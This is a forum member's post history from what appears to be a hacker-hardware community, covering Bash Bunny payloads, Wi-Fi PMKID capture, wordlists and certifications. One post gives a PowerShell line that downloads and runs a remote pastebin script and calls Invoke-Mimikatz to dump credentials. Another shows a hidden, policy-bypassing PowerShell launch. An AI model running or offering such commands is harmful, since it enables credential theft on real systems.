Jump to content

PoSHMagiC0de

Dedicated Members
  • Posts

    618
  • Joined

  • Last visited

  • Days Won

    26

Everything posted by PoSHMagiC0de

  1. We are going to need a VM to compile this and redistribute onto the bunny. You can get the compiling going by install build-essential with aptitude but the Bunny chokes on the compilation on different parts different times. It cannot handle it. If you want to continue to try then apt install build-essential while inet sharing and try the pip install -r requirements.txt again to see if it compiles. You will also need to pip install --upgrade setuptools to get rid of another error. I gave up when I saw it was compiling as I know any compilation I did on the bunny that pushed it usually locks up.
  2. Wait, you launching powershell from within powershell? If you are, that is your issue. Depending on what you are trying to do, you will have to do it differently. If ran from the command line that will work. But if within Powershell then the below will need to be done. Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`"" But if you are already in Powershell, I do not see the need for the above.
  3. Try changing the "-C" to a "/C". I noticed on Windows that sometimes the "-"s break stuff like using in wmi to launch processes with command line arguments.
  4. You can or you can ssh into it and work on the command line if you are L33t enough. It has an internal web interface on the Pineapple. It is not served from their site. I believe the dashboard does connect to their portal which just to pull down news.
  5. Yeah..... I read through this thread twice and still got lost. If I read it correctly from the original question, it is asked why Hak5 products are tied to their servers. Well, they are not. The BashBunny, RUbbr ducky, and all their stuff does not require you to speak back to their server. If you want new firmware and stuff, you can download it and install it but usage does not require..nor does it..talk back to Hak5. The Cloud C2 might and if it does, it will be for product registration since that is one of their only products that has a free and paid tier so it has licenses. So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them. Support you get is all manual. Manual calling/emailing them and manually downloading and installing updates. Hmm, I think the Pineapple speaks back to their server but only to return if there are updates and I believe there is an option to turn that off.
  6. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for gps data. Not even a rest api for it else I would suggest building a service in whatever language you want that can hit the rest api of bettercap to query that data on a time interval. For something like this, kismet might be a better choice. Setup kismet as sensor on your remote devices that can communicate to a kismet instance that is the server. Though, I wouldn't shoot that openly across the inet. Maybe create VPN or SSH tunnels back to server and server it through there? Have the kismet listener listening on local host only for the ssh tunnel or the private vpn network for vpn tunnel. You get it.
  7. This is a Powershell module I have been using for a while now. Figured I will share it here. The git readme is thorough enough to explain how it works. Cool features it has is if you are planning to run your finished script as a command from the command prompt then it warns if you are over the character limit. https://github.com/danielbohannon/Invoke-Obfuscation
  8. Lol. That was a hilarious blunder. I don't have a rooted phone for this device. 😑
  9. Hmm, wonder if encryption software people who have no way of decrypting customer data can just not offer their products to Australia to avoid breaking their software? I would.
  10. You can also get is VPS like Digital Oceans (Bithost is the same thing but with bitcoin) and use the roadwarrior script to setup a quick SSLVPN of your own before heading out and then use that with openvpn to hide your traffic.
  11. One thing I have done with crunch as an experiment to targeted wordlist generation is take a sample wordlist of a target. From that get a list of all unique characters of list (to prevent repetition we do no need and will not make sense). I then choose a minimum word size and max word size I think the word or phrase will be. I be sure to include a space in the character list so phrases can be generated. From that you can generate smaller wordlists only using characters from words you think make up their password using crunch.
  12. Hey, Anyone try out Go yet? Watched a 8 hour youtube video on it (not all at once of course) and been messing with it for almost a month. I like it. I like C but hate the tediousness of it sometimes if you want to do something simple. I like dynamic languages like Python that make it easy to do a lot of things without thinking too hard but hate it doesn't have strict typeness when I want it at runtime unless I implement my own methods of insuring it. Go gives me both and the simple concept of concurrency in it is a plus because we all love trying to handle sharing data among threads. 🙂 Who else has given this language a "Go"? See what I did there? 😛
  13. Try this: powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;" You passed the name already. No need to reference it in the variable. Surprised it even works in your stand alone tests unless you are already in the folder with the d.cmd file. Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell.
  14. Okay, my bad. I posted the wrong link. Empire team has not updated their version yet. The version that works is still in the pull request and does work for Win10.
  15. hcxdumptool doesn't quit when it has the pmkid plus there is one more tool needed to convert what hcxdumptool gets to a hashcat crackable formatted hash. I looked into automating these but not so simple. I have been messing with scapy with 802.11 and it maybe possible to automate this in python. You will need to setup a channel hopping beacon capture part to get access points. You will need to setup a thread after that to handle association with scapy and monitor it once APs are found. You will need a thread to begin authentication but not finish. The pmkid is usually sent when the AP sends its ANounce. You will just need to figure out how to create the 16800 hash that hashcat can understand to pass it to hashcat. I been busy with a talk for a DevFest that happened here but am free and might look into this. It maybe possible though depending on if you can get association and all that working. You could try aireplay-ng for the association but it doesn't return anything to let you know if it is associated (no error codes or stuff). if the AP os mac filtering then this can be an issue.
  16. Yelp, MS released an update that prevents part of the payloads from running, the part that injects mimikatz into memory. See my new post on thread.
  17. Looks like we are going to have to start rolling our own crypto or use older version of "non backdoored" versions. Government always want to look at people's nudie pics and porno behind their back. Tell them to go find their own porno. Perverted gov agents.
  18. I am leaning the direction of @barry99705 I was the type to push everyone toward college back in the day but now I have been more picky as to when you need to spend half your life on a student loan if you do not have to. School versus payoff these days has gotten tough when it comes to loans so I always try to steer people from them if they can attain the knowledge just as well from other means but that is just my background when it comes to education these days. Though I still believe in obtaining knowledge. Now, with that. My job put me through the CeHv9 course. I have practice exams and from people who paid to take the test for the cert and the practice exams I lost interest in a CeH cert. Nothing to do with the difficulty of the test. Doesn't seem hard. It was just the content of the tests and those wacky throw-ins (which are in the practice too) just made it feel like the industry tried to standardize hacking. It was watered down and made me feel someone with no real world experience can get one of these and be mistaken for a security expert, like an MCSE . If you want a cert, aim for the OSCP if you have to spend money on a qualification. From what I seen of it, it shows real world knowledge and you can even learn from it if you fail vs a CeH if you fail means you have to go memorize more stuff. I am not knocking on those who already have the CeH cert. Even I was going down that path to have a piece of paper to satisfy some industry goons. Ultimately, I am settling on getting OSCP type of certs as they have shown to attain them you have to show some sort of real world competence in the field. I say "hack" together your own learning and education path.
  19. http://overthewire.org The above is another one with wargames on it.
  20. Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting> Else it goes after every beacon it hears. You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID. Have to check if there is a param to quit after 1 pmkid is captured for automation.
  21. Maybe a yagi and a wifi amp? I built me a couple of cantennas from stainless steel toilet brush holders and mounted them to tripods. Good range directionally. I am waiting for a 3000mW 35db amp to come in this week to see if I can make it go even further. For extreme ranges you will need a directional antenna which seems to work good and maybe an amp if you want to get more. Heck on amazon you can get some huge wifi amps and a parabolic dish if you are that serious.
  22. Hmm, could the command be added to the interfaces file after autoup-ing the interface? Might can create a service that starts after the interface is up. Background bash file called from local.rc that looks at interface every 5 seconds and launches netcat when an ip shows?
  23. I waited to reply to this. I am an old fud. There is nothing wrong with using the tools other before you have provided. The thing that makes me really call someone a script kiddy is when their learning and understanding stops there. So, you have this tool and its source..or an exploit and its source but you never bothered to look into how it works or what makes it tick. You never reverse engineered it to see what is going on hence you really do not know what it is doing. That is like giving a 5 year old a nuke. They know it goes boom but they do not know anything about fallout and radiation. So, being a temporary kiddy on your way to understanding is cool. Being a kiddy because you are mentally lazy is not hacking. Doesn't even define the word because you are only an expert at running someone else's tool. In my opinion you become one of the masses on github asking a creator they should figure out and add a certain exploit instead of themselves knowing anything about how the exploit works, much less adding it themselves. That is a script kiddy through and through. So, if you use metasploit to pop a test box, look at how that exploit works. Try and rewrite it in another language like python or whatever. Metasploit even comes with tools built into itself to inspect its payloads source. Want to learn how to exploit with Powershell, look at Empire and its modules. Use the tool and then look under the hood to see how it is pulled off so you know and can do this in any situation with almost any custom code. In the process you may come up with cool ideas yourself. Those two tools have taught me so much about how a C&C server would work. A magician pulling a magic trick when the magician who is doing it has no idea how they did it is sad. Funny when someone in the audience does know and can do it even better because they do.
  24. Also, if I read correctly you are planning on having a public facing exploitable machine with a VPN tunnel to your internal network? Hmm, I would not do that. You can accomplish a lab like this all internally without facing anything to the public with VMs and a pfsense VM. Pretty much all you are going to be practicing is exploiting a firewalled machine with some services port forwarded that your attacker can see with a VPN to some machine or machines in another subnet firewalled except for VPN.
  25. Or, it could be MS is buying Github so they can all of a sudden change the terms of service and then jack everyone's code on the site to make a profit off of using it in their projects and make up some BS for the original creator to not get credit. That sounds more like Microsoft. It follows their history of stealing starting with Bill himself.
×
×
  • Create New...